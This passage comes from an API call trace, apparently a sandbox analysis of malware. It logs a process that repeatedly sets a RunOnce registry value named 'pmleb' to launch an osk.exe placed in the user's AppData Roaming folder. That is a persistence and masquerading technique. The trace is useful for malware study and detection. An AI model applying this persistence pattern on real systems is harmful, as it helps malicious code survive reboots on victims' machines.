lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.627] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.627] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, 
lpdwDisposition=0x0) returned 0x0 [0091.628] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.628] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.628] RegCloseKey (hKey=0x280) returned 0x0 [0091.628] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.628] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.628] SetTimer (hWnd=0x20280, nIDEvent=0x21da, uElapse=0xa, lpTimerFunc=0x0) returned 0x21da [0091.628] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.898] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.898] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.898] KillTimer (hWnd=0x20280, uIDEvent=0x21da) returned 1 [0091.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.899] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.899] IUnknown:Release (This=0x787518) returned 0x1 [0091.899] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.899] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.899] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, 
pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.900] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: 
ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.900] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.900] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0091.900] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.900] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x60 [0091.900] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.901] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0091.901] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.901] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.901] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.901] 
IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.901] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.901] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.901] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.901] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.902] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.902] RegCloseKey (hKey=0x280) returned 0x0 [0091.902] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.902] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.902] SetTimer (hWnd=0x20280, nIDEvent=0x21db, uElapse=0xa, lpTimerFunc=0x0) returned 0x21db [0091.902] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 
1 [0091.908] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.909] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.909] KillTimer (hWnd=0x20280, uIDEvent=0x21db) returned 1 [0091.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.909] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.909] IUnknown:Release (This=0x787518) returned 0x1 [0091.909] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.909] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.909] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.910] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.910] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0091.910] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.910] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x61 [0091.910] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.911] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0091.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.911] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.911] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.911] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.911] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.911] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.911] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.911] RegCloseKey (hKey=0x280) returned 0x0 [0091.912] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.912] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.912] SetTimer (hWnd=0x20280, nIDEvent=0x21dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21dc [0091.912] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.922] KillTimer (hWnd=0x20280, uIDEvent=0x21dc) returned 1 [0091.922] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.922] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.922] IUnknown:Release (This=0x787518) returned 0x1 [0091.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.923] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.923] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.923] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.923] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.924] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0091.924] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.924] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x62 [0091.924] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.925] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0091.925] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.925] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.925] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.925] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.925] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.925] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.926] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.926] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.926] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
